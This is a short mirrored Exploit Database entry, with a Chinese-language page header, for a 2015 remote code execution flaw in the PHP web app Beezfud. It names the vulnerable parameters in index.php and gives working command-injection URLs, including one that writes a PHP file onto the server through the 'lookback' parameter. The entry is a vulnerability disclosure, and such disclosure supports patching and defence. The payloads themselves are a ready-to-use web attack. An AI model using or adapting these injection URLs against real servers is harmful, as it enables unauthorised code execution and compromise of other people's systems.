Beezfud – Remote Code Execution

• Exploit Database
• 104 阅读

• 作者： Ashiyane Digital Security Team
  日期： 2015-12-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39093/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

  ================================================================================ # Beezfud Remote Code Execution ================================================================================ # Vendor Homepage: https://github.com/EVA-01/beezfud # Date: 23/12/2015 # Software Link: https://github.com/EVA-01/beezfud/archive/master.zip # Author: Ashiyane Digital Security Team # Contact: hehsan979@gmail.com # Source: http://ehsansec.ir/advisories/beezfud-exec.txt ================================================================================ # Vulnerable File : index.php   # PoC :   http://localhost/beezfud/index.php?parameter=;Command;   Vulnerable Parameters : lookback , max , range , latest , earliest     Example :   http://localhost/beezfud/index.php?lookback=;echo &apos;<?php phpinfo(); ?>&apos; >info.php;   ================================================================================ # Discovered By : Ehsan Hosseini (EhsanSec.ir) ================================================================================